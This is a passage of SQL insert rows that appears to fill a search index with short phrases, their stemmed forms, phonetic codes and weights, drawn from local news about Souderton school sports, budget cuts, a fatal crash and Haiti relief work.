met',0,1,1.3667,'W253',1,'en'),(48278,'001.02','001.02',0,0,0.6,'',1,'en'),(48279,'001.02 will','001.02 will',0,1,1.3667,'W400',1,'en'),(48280,'001.02 will be','001.02 will be',0,1,1.4667,'W410',1,'en'),(48281,'1.02','1.02',0,0,0.4,'',1,'en'),(48282,'1.02 for','1.02 for',0,1,1.2667,'F600',1,'en'),(48283,'1.02 for example','1.02 for example',0,1,1.5333,'F62514',1,'en'),(48284,'10 000','10 000',0,1,1.2,'',1,'en'),(48285,'10 000 was','10 000 was',0,1,1.3333,'W200',1,'en'),(48286,'11 where','11 where',0,1,1.2667,'W600',1,'en'),(48287,'11 where do','11 where do',0,1,1.3667,'W630',1,'en'),(48288,'115','115',0,0,0.3,'',1,'en'),(48289,'12 takes','12 takes',0,1,1.2667,'T200',1,'en'),(48290,'12 takes on','12 takes on',0,1,1.3667,'T250',1,'en'),(48291,'17','17',0,0,0.2,'',1,'en'),(48292,'17 point','17 point',0,1,1.2667,'P530',1,'en'),(48293,'17 point fourth','17 point fourth',0,1,1.5,'P53163',1,'en'),(48294,'17 triumph','17 triumph',0,1,1.3333,'T651',1,'en'),(48295,'17 triumph not','17 triumph not',0,1,1.4667,'T65153',1,'en'),(48296,'20 001.02','20 001.02',0,1,1.3,'',1,'en'),(48297,'20 001.02 will','20 001.02 will',0,1,1.4667,'W400',1,'en'),(48298,'20 17','20 17',0,1,1.1667,'',1,'en'),(48299,'20 17 triumph','20 17 triumph',0,1,1.4333,'T651',1,'en'),(48300,'20 yard','20 yard',0,1,1.2333,'Y630',1,'en'),(48301,'20 yard field','20 yard field',0,1,1.4333,'Y63143',1,'en'),(48302,'2010 the','2010 the',0,1,1.2667,'T000',1,'en'),(48303,'2010 the concern','2010 the concern',0,1,1.5333,'T25265',1,'en'),(48304,'2011','2011',0,0,0.4,'',2,'en'),(48305,'2011 the','2011 the',0,1,1.2667,'T000',1,'en'),(48306,'2011 the souderton','2011 the souderton',0,1,1.6,'T23635',1,'en'),(48307,'2013 by','2013 by',0,1,1.2333,'B000',1,'en'),(48308,'2013 by ron','2013 by ron',0,1,1.3667,'B650',1,'en'),(48309,'22 2013 by','22 2013 by',0,1,1.3333,'B000',1,'en'),(48310,'22.an','22.an',0,0,0.3333,'A500',1,'en'),(48311,'22.an overall','22.an overall',0,1,1.4333,'A5164',1,'en'),(48312,'22.an overall total','22.an overall total',0,1,1.6333,'A516434',1,'en'),(48313,'25 suburban','25 suburban',0,1,1.3667,'S1615',1,'en'),(48314,'25 suburban one','25 suburban one',0,1,1.5,'S1615',1,'en'),(48315,'3 million','3 million',0,1,1.3,'M450',1,'en'),(48316,'3 million in','3 million in',0,1,1.4,'M450',1,'en'),(48317,'35','35',0,0,0.2,'',1,'en'),(48318,'35 25','35 25',0,1,1.1667,'',1,'en'),(48319,'35 25 suburban','35 25 suburban',0,1,1.4667,'S1615',1,'en'),(48320,'50 years','50 years',0,1,1.2667,'Y620',1,'en'),(48321,'50 years mcc','50 years mcc',0,1,1.4,'Y6252',1,'en'),(48322,'61','61',0,0,0.2,'',1,'en'),(48323,'61 moyer','61 moyer',0,1,1.2667,'M600',1,'en'),(48324,'61 moyer took','61 moyer took',0,1,1.4333,'M632',1,'en'),(48325,'63','63',0,0,0.2,'',1,'en'),(48326,'63 61','63 61',0,1,1.1667,'',1,'en'),(48327,'63 61 moyer','63 61 moyer',0,1,1.3667,'M600',1,'en'),(48328,'7 2010','7 2010',0,1,1.2,'',1,'en'),(48329,'7 2010 the','7 2010 the',0,1,1.3333,'T000',1,'en'),(48330,'89','89',0,0,0.2,'',1,'en'),(48331,'89 yr','89 yr',0,1,1.1667,'Y600',1,'en'),(48332,'89 yr old','89 yr old',0,1,1.3,'Y643',1,'en'),(48333,'a 17','a 17',0,1,1.1333,'A000',1,'en'),(48334,'a 17 point','a 17 point',0,1,1.3333,'A153',1,'en'),(48335,'a 20','a 20',0,1,1.1333,'A000',1,'en'),(48336,'a 20 17','a 20 17',0,1,1.2333,'A000',1,'en'),(48337,'a 35','a 35',0,1,1.1333,'A000',1,'en'),(48338,'a 35 25','a 35 25',0,1,1.2333,'A000',1,'en'),(48339,'a break in','a break in',0,1,1.3333,'A1625',1,'en'),(48340,'a budget','a budget',0,1,1.2667,'A1323',1,'en'),(48341,'a budget gap','a budget gap',0,1,1.4,'A132321',1,'en'),(48342,'a host','a host',0,1,1.2,'A230',1,'en'),(48343,'a host of','a host of',0,1,1.3,'A231',1,'en'),(48344,'a reliable','a reliable',0,1,1.3333,'A6414',1,'en'),(48345,'a reliable source','a reliable source',0,1,1.5667,'A6414262',1,'en'),(48346,'a result 22.an','a result 22.an',0,1,1.4667,'A62435',1,'en'),(48347,'a two','a two',0,1,1.1667,'A300',1,'en'),(48348,'a two vehicle','a two vehicle',0,1,1.4333,'A3124',1,'en'),(48349,'about souderton','about souderton',0,1,1.5,'A1323635',1,'en'),(48350,'about souderton articles','about souderton articles',0,1,1.8,'A132363563242',1,'en'),(48351,'about souderton sporting','about souderton sporting',0,1,1.8,'A1323635216352',1,'en'),(48352,'accident','accid',0,0,0.5333,'A2353',1,'en'),(48353,'accident but','accid but',0,1,1.4,'A235313',1,'en'),(48354,'accident but luke','accid but luke',0,1,1.5667,'A23531342',1,'en'),(48355,'across all','across all',0,1,1.3333,'A2624',1,'en'),(48356,'across all remaining','across all remaining',0,1,1.6667,'A2624652',1,'en'),(48357,'adding cheap','ad cheap',0,1,1.4,'A3521',1,'en'),(48358,'adding cheap pandora','ad cheap pandora',0,1,1.6667,'A3521536',1,'en'),(48359,'after the panther','after the panther',0,1,1.5667,'A13631536',1,'en'),(48360,'after watching','after watching',0,1,1.4667,'A1363252',1,'en'),(48361,'after watching tv','after watching tv',0,1,1.5667,'A136325231',1,'en'),(48362,'agency of','agenc of',0,1,1.3,'A2521',1,'en'),(48363,'agency of the','agenc of the',0,1,1.4333,'A25213',1,'en'),(48364,'ago in','ago in',0,1,1.2,'A250',1,'en'),(48365,'ago in souderton','ago in souderton',0,1,1.5333,'A2523635',1,'en'),(48366,'all earned','all earned',0,1,1.3333,'A4653',1,'en'),(48367,'all earned first','all earned first',0,1,1.5333,'A46531623',1,'en'),(48368,'all junior','all junior',0,1,1.3333,'A4256',1,'en'),(48369,'all junior high','all junior high',0,1,1.5,'A42562',1,'en'),(48370,'all remaining','all remaining',0,1,1.4333,'A4652',1,'en'),(48371,'all remaining sports','all remaining sports',0,1,1.6667,'A46521632',1,'en'),(48372,'almost 3','almost 3',0,1,1.2667,'A4523',1,'en'),(48373,'almost 3 million','almost 3 million',0,1,1.5333,'A4523545',1,'en'),(48374,'an 89','an 89',0,1,1.1667,'A500',1,'en'),(48375,'an 89 yr','an 89 yr',0,1,1.2667,'A560',1,'en'),(48376,'and as','and as',0,1,1.2,'A532',1,'en'),(48377,'and as a','and as a',0,1,1.2667,'A532',1,'en'),(48378,'and boys','and boys',0,1,1.2667,'A5312',1,'en'),(48379,'and boys soccer','and boys soccer',0,1,1.5,'A53126',1,'en'),(48380,'and brethren','and brethren',0,1,1.4,'A5316365',1,'en'),(48381,'and brethren in','and brethren in',0,1,1.5,'A5316365',1,'en'),(48382,'and competitive','and competitive',0,1,1.5,'A5325131',1,'en'),(48383,'and competitive recreational','and competitive recreational',0,1,1.9333,'A5325131626354',1,'en'),(48384,'and high','and high',0,1,1.2667,'A532',1,'en'),(48385,'and high school','and high school',0,1,1.5,'A5324',1,'en'),(48386,'and nolan','and nolan',0,1,1.3,'A53545',1,'en'),(48387,'and nolan ridgway','and nolan ridgway',0,1,1.5667,'A53545632',1,'en'),(48388,'and peace','and peace',0,1,1.3,'A5312',1,'en'),(48389,'and peace agency','and peace agency',0,1,1.5333,'A531252',1,'en'),(48390,'and sophomores','and sophomores',0,1,1.4667,'A5321562',1,'en'),(48391,'and sophomores devante','and sophomores devante',0,1,1.7333,'A53215623153',1,'en'),(48392,'and tennis','and tennis',0,1,1.3333,'A5352',1,'en'),(48393,'and tennis and','and tennis and',0,1,1.4667,'A535253',1,'en'),(48394,'and there would','and there would',0,1,1.5,'A53643',1,'en'),(48395,'and when','and when',0,1,1.2667,'A535',1,'en'),(48396,'and when nick','and when nick',0,1,1.4333,'A5352',1,'en'),(48397,'and wrestling','and wrestling',0,1,1.4333,'A53623452',1,'en'),(48398,'and wrestling freshmen','and wrestling freshmen',0,1,1.7333,'A536234521625',1,'en'),(48399,'area man','area man',0,1,1.2667,'A650',1,'en'),(48400,'area man died','area man died',0,1,1.4333,'A653',1,'en'),(48401,'area school','area school',0,1,1.3667,'A624',1,'en'),(48402,'area school district','area school district',0,1,1.6667,'A624323623',1,'en'),(48403,'aren\'t going','aren going',0,1,1.4,'A653252',1,'en'),(48404,'aren\'t going to','aren going to',0,1,1.5,'A6532523',1,'en'),(48405,'articles about souderton','articl about souderton',0,1,1.8,'A632421323635',1,'en'),(48406,'as it tries','as it tries',0,1,1.3667,'A2362',1,'en'),(48407,'as well and','as well and',0,1,1.3667,'A2453',1,'en'),(48408,'at eliminating','at eliminating',0,1,1.4667,'A345352',1,'en'),(48409,'at eliminating a','at eliminating a',0,1,1.5333,'A345352',1,'en'),(48410,'at good','at good',0,1,1.2333,'A323',1,'en'),(48411,'at good shepherd','at good shepherd',0,1,1.5333,'A3232163',1,'en'),(48412,'at the middle','at the middle',0,1,1.4333,'A3534',1,'en'),(48413,'baseball','basebal',0,0,0.5333,'B214',1,'en'),(48414,'baseball football','basebal football',0,1,1.5667,'B2141314',1,'en'),(48415,'baseball football football','basebal football football',0,1,1.8667,'B21413141314',1,'en'),(48416,'be all','be all',0,1,1.2,'B400',1,'en'),(48417,'be all junior','be all junior',0,1,1.4333,'B4256',1,'en'),(48418,'be coaching','be coaching',0,1,1.3667,'B252',1,'en'),(48419,'be coaching cuts','be coaching cuts',0,1,1.5333,'B25232',1,'en'),(48420,'be significant','be significant',0,1,1.4667,'B251253',1,'en'),(48421,'be significant into','be significant into',0,1,1.6333,'B25125353',1,'en'),(48422,'be submitted','be submitted',0,1,1.4,'B2153',1,'en'),(48423,'be submitted to','be submitted to',0,1,1.5,'B2153',1,'en'),(48424,'beat souderton','beat souderton',0,1,1.4667,'B323635',1,'en'),(48425,'beat souderton in','beat souderton in',0,1,1.5667,'B323635',1,'en'),(48426,'been a reliable','been a reliable',0,1,1.5,'B56414',1,'en'),(48427,'beside','besid',0,0,0.4,'B230',1,'en'),(48428,'beside the','besid the',0,1,1.3333,'B230',1,'en'),(48429,'beside the poorest','besid the poorest',0,1,1.6,'B231623',1,'en'),(48430,'bethlehem','bethlehem',0,0,0.6,'B345',1,'en'),(48431,'bethlehem coroner','bethlehem coroner',0,1,1.5667,'B3452656',1,'en'),(48432,'bethlehem coroner scott','bethlehem coroner scott',0,1,1.7667,'B345265623',1,'en'),(48433,'betwen','betwen',0,0,0.4,'B350',1,'en'),(48434,'betwen jan.15','betwen jan.15',0,1,1.4333,'B3525',1,'en'),(48435,'betwen jan.15 and','betwen jan.15 and',0,1,1.5667,'B35253',1,'en'),(48436,'big red','big red',0,1,1.2333,'B263',1,'en'),(48437,'big to','big to',0,1,1.2,'B230',1,'en'),(48438,'big to the','big to the',0,1,1.3333,'B230',1,'en'),(48439,'block','block',0,0,0.3333,'B420',1,'en'),(48440,'block in','block in',0,1,1.2667,'B425',1,'en'),(48441,'block in souderton','block in souderton',0,1,1.6,'B42523635',1,'en'),(48442,'blue they','blue they',0,1,1.3,'B430',1,'en'),(48443,'blue they just','blue they just',0,1,1.4667,'B4323',1,'en'),(48444,'blunt','blunt',0,0,0.3333,'B453',1,'en'),(48445,'blunt force','blunt force',0,1,1.3667,'B453162',1,'en'),(48446,'blunt force injuries','blunt force injuries',0,1,1.6667,'B4531625262',1,'en'),(48447,'boys soccer','boi soccer',0,1,1.3667,'B260',1,'en'),(48448,'boys soccer baseball','boi soccer baseball',0,1,1.6667,'B261214',1,'en'),(48449,'bracelets 2011','bracelet 2011',0,1,1.4667,'B62432',1,'en'),(48450,'bracelets 2011 the','bracelet 2011 the',0,1,1.6,'B624323',1,'en'),(48451,'break in','break in',0,1,1.2667,'B625',1,'en'),(48452,'break in friday\'s','break in friday',0,1,1.5667,'B6251632',1,'en'),(48453,'brethren','brethren',0,0,0.5333,'B6365',1,'en'),(48454,'brethren in','brethren in',0,1,1.3667,'B6365',1,'en'),(48455,'brethren in christ','brethren in christ',0,1,1.6,'B63652623',1,'en'),(48456,'budget gap','budget gap',0,1,1.3333,'B32321',1,'en'),(48457,'budget gap gone','budget gap gone',0,1,1.5,'B3232125',1,'en'),(48458,'but luke','but luke',0,1,1.2667,'B342',1,'en'),(48459,'but luke moyer','but luke moyer',0,1,1.4667,'B34256',1,'en'),(48460,'but rattled','but rattled',0,1,1.3667,'B36343',1,'en'),(48461,'but rattled off','but rattled off',0,1,1.5,'B363431',1,'en'),(48462,'by 1.02','by 1.02',0,1,1.2333,'B000',1,'en'),(48463,'by 1.02 for','by 1.02 for',0,1,1.3667,'B600',1,'en'),(48464,'by customers','by customers',0,1,1.4,'B23562',1,'en'),(48465,'by customers in','by customers in',0,1,1.5,'B235625',1,'en'),(48466,'by date','by date',0,1,1.2333,'B300',1,'en'),(48467,'by date tom','by date tom',0,1,1.3667,'B350',1,'en'),(48468,'by ron','by ron',0,1,1.2,'B650',1,'en'),(48469,'by ron kohl','by ron kohl',0,1,1.3667,'B6524',1,'en'),(48470,'cal','cal',0,0,0.2,'C400',1,'en'),(48471,'cal may','cal may',0,1,1.2333,'C450',1,'en'),(48472,'cal may 11','cal may 11',0,1,1.3333,'C450',1,'en'),(48473,'call demonstrate','call demonstrate',0,1,1.5333,'C4352363',1,'en'),(48474,'call demonstrate winning','call demonstrate winning',0,1,1.8,'C435236352',1,'en'),(48475,'canada girls','canada girls',0,1,1.4,'C532642',1,'en'),(48476,'canada girls field','canada girls field',0,1,1.6,'C532642143',1,'en'),(48477,'central committee\'s','central committee',0,1,1.6333,'C53642532',1,'en'),(48478,'central committee\'s haiti','central committee haiti',0,1,1.8333,'C536425323',1,'en'),(48479,'chance to talk','chanc to talk',0,1,1.4667,'C52342',1,'en'),(48480,'charms canada girls','charm canada girls',0,1,1.6333,'C652532642',1,'en'),(48481,'christ','christ',0,0,0.4,'C623',1,'en'),(48482,'christ churches','christ churches',0,1,1.5,'C623262',1,'en'),(48483,'christ churches or','christ churches or',0,1,1.6,'C6232626',1,'en'),(48484,'churches','church',0,0,0.5333,'C620',1,'en'),(48485,'churches or','church or',0,1,1.3667,'C626',1,'en'),(48486,'churches or even','church or even',0,1,1.5333,'C62615',1,'en'),(48487,'close a','close a',0,1,1.2333,'C420',1,'en'),(48488,'close a budget','close a budget',0,1,1.4667,'C421323',1,'en'),(48489,'coaching','coach',0,0,0.5333,'C520',1,'en'),(48490,'coaching cuts','coach cuts',0,1,1.4333,'C5232',1,'en'),(48491,'coaching cuts across','coach cuts across',0,1,1.6667,'C523262',1,'en'),(48492,'committee\'s','committe',0,0,0.7333,'C532',1,'en'),(48493,'committee\'s haiti','committe haiti',0,1,1.5667,'C5323',1,'en'),(48494,'competitive','competit',0,0,0.7333,'C5131',1,'en'),(48495,'competitive recreational','competit recreational',0,1,1.8,'C5131626354',1,'en'),(48496,'competitive recreational softball','competit recreational softball',0,1,2,'C513162635421314',1,'en'),(48497,'concern share','concern share',0,1,1.4333,'C526526',1,'en'),(48498,'concern share thrift','concern share thrift',0,1,1.6667,'C5265263613',1,'en'),(48499,'conference','confer',0,0,0.6667,'C51652',1,'en'),(48500,'conference title','confer title',0,1,1.5333,'C5165234',1,'en'),(48501,'conference title souderton','confer title souderton',0,1,1.8667,'C516523423635',1,'en'),(48502,'conference victory','confer victory',0,1,1.6,'C516521236',1,'en'),(48503,'conference victory over','confer victory over',0,1,1.7667,'C51652123616',1,'en'),(48504,'content','content',0,0,0.4667,'C5353',1,'en'),(48505,'content by','content by',0,1,1.3333,'C53531',1,'en'),(48506,'content by date','content by date',0,1,1.5,'C535313',1,'en'),(48507,'coroner','coron',0,0,0.4667,'C656',1,'en'),(48508,'coroner said','coron said',0,1,1.4,'C65623',1,'en'),(48509,'coroner said at','coron said at',0,1,1.5,'C65623',1,'en'),(48510,'coroner scott','coron scott',0,1,1.4333,'C65623',1,'en'),(48511,'coroner scott grim','coron scott grim',0,1,1.6,'C65623265',1,'en'),(48512,'crash','crash',0,0,0.3333,'C620',1,'en'),(48513,'crash two','crash two',0,1,1.3,'C623',1,'en'),(48514,'crash two months','crash two months',0,1,1.5333,'C623532',1,'en'),(48515,'cross','cross',0,0,0.3333,'C620',1,'en'),(48516,'cross and','cross and',0,1,1.3,'C6253',1,'en'),(48517,'cross and nolan','cross and nolan',0,1,1.5,'C6253545',1,'en'),(48518,'custom made hospital','custom made hospital',0,1,1.6667,'C3532134',1,'en'),(48519,'customers in','custom in',0,1,1.4,'C35625',2,'en'),(48520,'customers in excess','custom in excess',0,1,1.6333,'C356252',1,'en'),(48521,'cuts','cut',0,0,0.2667,'C320',1,'en'),(48522,'cuts across','cut across',0,1,1.3667,'C3262',1,'en'),(48523,'cuts across all','cut across all',0,1,1.5,'C32624',1,'en'),(48524,'date tom','date tom',0,1,1.2667,'D500',1,'en'),(48525,'date tom housenick','date tom housenick',0,1,1.6,'D5252',1,'en'),(48526,'days i','dai i',0,1,1.2,'D200',1,'en'),(48527,'days i make','dai i make',0,1,1.3667,'D252',1,'en'),(48528,'defense','defens',0,0,0.4667,'D152',1,'en'),(48529,'defense held','defens held',0,1,1.4,'D15243',1,'en'),(48530,'defense held souderton','defens held souderton',0,1,1.7333,'D1524323635',1,'en'),(48531,'demonstrate','demonstr',0,0,0.7333,'D52363',1,'en'),(48532,'demonstrate winning','demonstr winning',0,1,1.6333,'D5236352',1,'en'),(48533,'demonstrate winning the','demonstr winning the',0,1,1.7667,'D52363523',1,'en'),(48534,'devante','devant',0,0,0.4667,'D153',1,'en'),(48535,'devante cross','devant cross',0,1,1.4333,'D153262',1,'en'),(48536,'devante cross and','devant cross and',0,1,1.5667,'D15326253',1,'en'),(48537,'dicing','dice',0,0,0.4,'D252',1,'en'),(48538,'dicing block','dice block',0,1,1.4,'D252142',1,'en'),(48539,'dicing block in','dice block in',0,1,1.5,'D2521425',1,'en'),(48540,'died friday','di friday',0,1,1.3667,'D163',1,'en'),(48541,'died friday of','di friday of',0,1,1.4667,'D1631',1,'en'),(48542,'died of','di of',0,1,1.2333,'D100',1,'en'),(48543,'died of ramifications','di of ramifications',0,1,1.7,'D16512352',1,'en'),(48544,'different points','differ points',0,1,1.5333,'D16531532',1,'en'),(48545,'different points of','differ points of',0,1,1.6333,'D165315321',1,'en'),(48546,'district','district',0,0,0.5333,'D23623',1,'en'),(48547,'district is','district is',0,1,1.3667,'D236232',1,'en'),(48548,'district is looking','district is looking',0,1,1.6333,'D2362324252',1,'en'),(48549,'double','doubl',0,0,0.4,'D140',1,'en'),(48550,'double extra','doubl extra',0,1,1.4,'D14236',1,'en'),(48551,'double extra last','doubl extra last',0,1,1.5667,'D14236423',1,'en'),(48552,'during a','dure a',0,1,1.2667,'D652',1,'en'),(48553,'during a break','dure a break',0,1,1.4667,'D652162',1,'en'),(48554,'during different','dure different',0,1,1.5333,'D65231653',1,'en'),(48555,'during different points','dure different points',0,1,1.7667,'D652316531532',1,'en'),(48556,'earned','earn',0,0,0.4,'E653',1,'en'),(48557,'earned first','earn first',0,1,1.4,'E6531623',1,'en'),(48558,'earned first team','earn first team',0,1,1.5667,'E65316235',1,'en'),(48559,'earthquake','earthquak',0,0,0.6667,'E632',1,'en'),(48560,'earthquake relief','earthquak relief',0,1,1.5667,'E632641',1,'en'),(48561,'earthquake relief effort','earthquak relief effort',0,1,1.8,'E63264163',1,'en'),(48562,'effort mcc','effort mcc',0,1,1.3333,'E16352',1,'en'),(48563,'effort mcc has','effort mcc has',0,1,1.4667,'E16352',1,'en'),(48564,'eliminating','elimin',0,0,0.7333,'E45352',1,'en'),(48565,'eliminating a','elimin a',0,1,1.4333,'E45352',1,'en'),(48566,'eliminating a host','elimin a host',0,1,1.6,'E453523',1,'en'),(48567,'end as','end as',0,1,1.2,'E532',1,'en'),(48568,'end as well','end as well',0,1,1.3667,'E5324',1,'en'),(48569,'even smy','even smy',0,1,1.2667,'E1525',1,'en'),(48570,'even smy friend','even smy friend',0,1,1.5,'E15251653',1,'en'),(48571,'even so','even so',0,1,1.2333,'E152',1,'en'),(48572,'even so will','even so will',0,1,1.4,'E1524',1,'en'),(48573,'example betwen','exampl betwen',0,1,1.4667,'E2514135',1,'en'),(48574,'example betwen jan.15','exampl betwen jan.15',0,1,1.7,'E251413525',1,'en'),(48575,'excess','excess',0,0,0.4,'E200',1,'en'),(48576,'excess of','excess of',0,1,1.3,'E210',1,'en'),(48577,'excess of the','excess of the',0,1,1.4333,'E213',1,'en'),(48578,'expenses to','expens to',0,1,1.3667,'E21523',1,'en'),(48579,'expenses to close','expens to close',0,1,1.5667,'E21523242',1,'en'),(48580,'expertly','expertli',0,0,0.5333,'E21634',1,'en'),(48581,'expertly written','expertli written',0,1,1.5333,'E21634635',1,'en'),(48582,'expertly written content','expertli written content',0,1,1.8,'E2163463525353',1,'en'),(48583,'extra last','extra last',0,1,1.3333,'E236423',1,'en'),(48584,'extra last friday','extra last friday',0,1,1.5667,'E236423163',1,'en'),(48585,'few days i','few days i',0,1,1.3333,'F320',1,'en'),(48586,'field goal','field goal',0,1,1.3333,'F4324',1,'en'),(48587,'field goal found','field goal found',0,1,1.5333,'F4324153',1,'en'),(48588,'field hockey','field hockey',0,1,1.4,'F432',1,'en'),(48589,'field hockey lacrosse','field hockey lacrosse',0,1,1.7,'F4324262',1,'en'),(48590,'finally','final',0,0,0.4667,'F540',1,'en'),(48591,'finally had','final had',0,1,1.3667,'F543',1,'en'),(48592,'finally had itself','final had itself',0,1,1.6,'F543241',1,'en'),(48593,'football','footbal',0,0,0.5333,'F314',1,'en'),(48594,'football and','footbal and',0,1,1.4,'F31453',1,'en'),(48595,'football and wrestling','footbal and wrestling',0,1,1.7333,'F31453623452',1,'en'),(48596,'football field','footbal field',0,1,1.4667,'F314143',1,'en'),(48597,'football field hockey','footbal field hockey',0,1,1.7,'F3141432',1,'en'),(48598,'football football','footbal football',0,1,1.5667,'F3141314',1,'en'),(48599,'football football and','footbal football and',0,1,1.7,'F314131453',1,'en'),(48600,'football team','footbal team',0,1,1.4333,'F31435',1,'en'),(48601,'football team beat','footbal team beat',0,1,1.6,'F3143513',1,'en'),(48602,'for a 35','for a 35',0,1,1.2667,'F600',1,'en'),(48603,'for example','for example',0,1,1.3667,'F62514',1,'en'),(48604,'for example betwen','for example betwen',0,1,1.6,'F62514135',1,'en'),(48605,'for football','for football',0,1,1.4,'F61314',1,'en'),(48606,'for football field','for football field',0,1,1.6,'F61314143',1,'en'),(48607,'for over 50','for over 50',0,1,1.3667,'F616',1,'en'),(48608,'for the panthers','for the panthers',0,1,1.5333,'F6315362',1,'en'),(48609,'force injuries','forc injuries',0,1,1.4667,'F625262',1,'en'),(48610,'force injuries in','forc injuries in',0,1,1.5667,'F6252625',1,'en'),(48611,'found its','found its',0,1,1.3,'F532',1,'en'),(48612,'found its way','found its way',0,1,1.4333,'F532',1,'en'),(48613,'four touchdowns','four touchdowns',0,1,1.5,'F632352',1,'en'),(48614,'four touchdowns in','four touchdowns in',0,1,1.6,'F6323525',1,'en'),(48615,'fourth','fourth',0,0,0.4,'F630',1,'en'),(48616,'fourth quarter','fourth quarter',0,1,1.4667,'F632636',1,'en'),(48617,'fourth quarter lead','fourth quarter lead',0,1,1.6333,'F63263643',1,'en'),(48618,'freshmen','freshmen',0,0,0.5333,'F625',1,'en'),(48619,'freshmen teams','freshmen teams',0,1,1.4667,'F625352',1,'en'),(48620,'freshmen teams for','freshmen teams for',0,1,1.6,'F62535216',1,'en'),(48621,'friday night','fridai night',0,1,1.4,'F63523',1,'en'),(48622,'friday night just','fridai night just',0,1,1.5667,'F6352323',1,'en'),(48623,'friday of','fridai of',0,1,1.3,'F631',1,'en'),(48624,'friday of injuries','fridai of injuries',0,1,1.6,'F6315262',1,'en'),(48625,'friday\'s','fridai',0,0,0.5333,'F632',1,'en'),(48626,'friday\'s preparation','fridai preparation',0,1,1.6667,'F632161635',1,'en'),(48627,'friday\'s preparation junior','fridai preparation junior',0,1,1.9,'F632161635256',1,'en'),(48628,'friend','friend',0,0,0.4,'F653',1,'en'),(48629,'friend even','friend even',0,1,1.3667,'F65315',1,'en'),(48630,'friend even so','friend even so',0,1,1.4667,'F653152',1,'en'),(48631,'from it','from it',0,1,1.2333,'F653',1,'en'),(48632,'from it out','from it out',0,1,1.3667,'F653',1,'en'),(48633,'from multiple','from multiple',0,1,1.4333,'F654314',1,'en'),(48634,'from multiple blunt','from multiple blunt',0,1,1.6333,'F6543141453',1,'en'),(48635,'from scrimmage','from scrimmage',0,1,1.4667,'F652652',1,'en'),(48636,'from scrimmage but','from scrimmage but',0,1,1.6,'F65265213',1,'en'),(48637,'gap','gap',0,0,0.2,'G100',1,'en'),(48638,'gap gone','gap gone',0,1,1.2667,'G125',1,'en'),(48639,'gap gone would','gap gone would',0,1,1.4667,'G12543',1,'en'),(48640,'gift of','gift of',0,1,1.2333,'G131',1,'en'),(48641,'gift of 10','gift of 10',0,1,1.3333,'G131',1,'en'),(48642,'girls field','girl field',0,1,1.3667,'G642143',1,'en'),(48643,'girls field hockey','girl field hockey',0,1,1.6,'G6421432',1,'en'),(48644,'go just','go just',0,1,1.2333,'G300',1,'en'),(48645,'go just pretty','go just pretty',0,1,1.4667,'G3163',1,'en'),(48646,'goal by','goal by',0,1,1.2333,'G410',1,'en'),(48647,'goal by 1.02','goal by 1.02',0,1,1.4,'G410',1,'en'),(48648,'goal found','goal found',0,1,1.3333,'G4153',1,'en'),(48649,'goal found its','goal found its',0,1,1.4667,'G41532',1,'en'),(48650,'going to win','go to win',0,1,1.4,'G5235',1,'en'),(48651,'gone','gone',0,0,0.2667,'G500',1,'en'),(48652,'gone would','gone would',0,1,1.3333,'G543',1,'en'),(48653,'gone would be','gone would be',0,1,1.4333,'G5431',1,'en'),(48654,'good shepherd','good shepherd',0,1,1.4333,'G32163',1,'en'),(48655,'good shepherd custom','good shepherd custom',0,1,1.6667,'G32163235',1,'en'),(48656,'goods staff','good staff',0,1,1.3667,'G3231',1,'en'),(48657,'goods staff on','good staff on',0,1,1.4667,'G32315',1,'en'),(48658,'graduation','graduat',0,0,0.6667,'G635',1,'en'),(48659,'graduation levels','graduat levels',0,1,1.5667,'G6354142',1,'en'),(48660,'graduation levels as','graduat levels as',0,1,1.6667,'G6354142',1,'en'),(48661,'graduation winter','graduat winter',0,1,1.5667,'G63536',1,'en'),(48662,'graduation winter track','graduat winter track',0,1,1.7667,'G63536362',1,'en'),(48663,'grim','grim',0,0,0.2667,'G650',1,'en'),(48664,'grim said','grim said',0,1,1.3,'G6523',1,'en'),(48665,'grim said he','grim said he',0,1,1.4,'G6523',1,'en'),(48666,'guys','gui',0,0,0.2667,'G000',1,'en'),(48667,'guys morgans','gui morgans',0,1,1.4,'G56252',1,'en'),(48668,'guys morgans said','gui morgans said',0,1,1.5667,'G562523',1,'en'),(48669,'had itself','had itself',0,1,1.3333,'H3241',1,'en'),(48670,'had itself a','had itself a',0,1,1.4,'H3241',1,'en'),(48671,'haiti','haiti',0,0,0.3333,'H300',1,'en'),(48672,'haiti january','haiti january',0,1,1.4333,'H3256',1,'en'),(48673,'haiti january 7','haiti january 7',0,1,1.5,'H3256',1,'en'),(48674,'haiti working','haiti working',0,1,1.4333,'H36252',1,'en'),(48675,'haiti working beside','haiti working beside',0,1,1.6667,'H36252123',1,'en'),(48676,'hands','hand',0,0,0.3333,'H532',1,'en'),(48677,'hands the','hand the',0,1,1.3,'H5323',1,'en'),(48678,'hands the rams','hand the rams',0,1,1.4667,'H5323652',1,'en'),(48679,'hard way','hard way',0,1,1.2667,'H630',1,'en'),(48680,'hard way quakertown','hard way quakertown',0,1,1.6333,'H632635',1,'en'),(48681,'have a chance','have a chance',0,1,1.4333,'H1252',1,'en'),(48682,'he died of','he died of',0,1,1.3333,'H310',1,'en'),(48683,'he suffered','he suffered',0,1,1.3667,'H2163',1,'en'),(48684,'he suffered in','he suffered in',0,1,1.4667,'H21635',1,'en'),(48685,'held souderton','held souderton',0,1,1.4667,'H4323635',1,'en'),(48686,'held souderton scoreless','held souderton scoreless',0,1,1.8,'H43236352642',1,'en'),(48687,'help haiti','help haiti',0,1,1.3333,'H413',1,'en'),(48688,'help haiti january','help haiti january',0,1,1.6,'H413256',1,'en'),(48689,'help production','help production',0,1,1.5,'H4163235',1,'en'),(48690,'help production and','help production and',0,1,1.6333,'H41632353',1,'en'),(48691,'hemisphere','hemispher',0,0,0.6667,'H5216',1,'en'),(48692,'hemisphere for','hemispher for',0,1,1.4667,'H521616',1,'en'),(48693,'hemisphere for over','hemispher for over',0,1,1.6333,'H52161616',1,'en'),(48694,'high school graduation','high school graduation',0,1,1.7333,'H242635',1,'en'),(48695,'high school junior','high school junior',0,1,1.6,'H24256',1,'en'),(48696,'high\'s','high',0,0,0.4,'H200',1,'en'),(48697,'high\'s football','high football',0,1,1.5,'H21314',1,'en'),(48698,'high\'s football team','high football team',0,1,1.6667,'H2131435',1,'en'),(48699,'his own','hi own',0,1,1.2333,'H250',1,'en'),(48700,'his own hands','hi own hands',0,1,1.4333,'H2532',1,'en'),(48701,'hockey','hockei',0,0,0.4,'H200',1,'en'),(48702,'hockey lacrosse','hockei lacrosse',0,1,1.5,'H24262',1,'en'),(48703,'hockey lacrosse soccer','hockei lacrosse soccer',0,1,1.7333,'H242626',1,'en'),(48704,'hockey lacrosse softball','hockei 